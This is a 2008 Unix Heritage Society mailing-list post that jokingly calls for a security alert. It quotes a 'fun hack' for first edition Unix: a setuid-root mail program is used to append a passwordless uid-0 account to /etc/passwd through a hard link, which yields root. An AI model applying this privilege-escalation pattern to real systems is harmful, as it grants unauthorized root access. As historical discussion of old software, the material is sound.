[TUHS] Some fun with 1st ed
Larry McVoy
lm at bitmover.com
Sun May 4 05:24:00 AEST 2008
We need to send out a security alert immediately. This is serious.
On Sat, May 03, 2008 at 09:20:13AM -1000, Tim Newsham wrote:
> All work and no play...
>
> Here's a fun hack for first edition unix. From MAIL (I) :
>
> When followed by the names of a letter and one or more people, the
> letter is appended to each person's mailbox. Each letter is
> preceded by the sender's name and a postmark.
>
> A person is either the nameof an entry in the directory /usr, in
> which case the mail is sent to /usr/person/mailbox, or the path
> of a directory, in which case mailbox in that directory is used.
>
> Mail is setuid root:
>
> # ls -l /bin/mail
> 80 surwr- 1 root 3940 Jan 1 00:00:00 mail
>
> login as a non-root user (ie "bin"), create a file "letter" with the
> contents "hack::0:/:". Run:
>
> @ ln /etc/passwd /tmp/mailbox
> @ mail letter /tmp
>
> log out and log back in as "hack". You are now root. Cat /etc/passwd
> and notice:
>
> From bin Jan 1 00:49:22
> hack::0:/:
>
> clean up the file a little and enjoy your new elevated status.
>
> Tim Newsham
> http://www.thenewsh.com/~newsham/
> _______________________________________________
> TUHS mailing list
> TUHS at minnie.tuhs.org
> https://minnie.tuhs.org/mailman/listinfo/tuhs
--
---
Larry McVoy lm at bitmover.com http://www.bitkeeper.com
More information about the TUHS
mailing list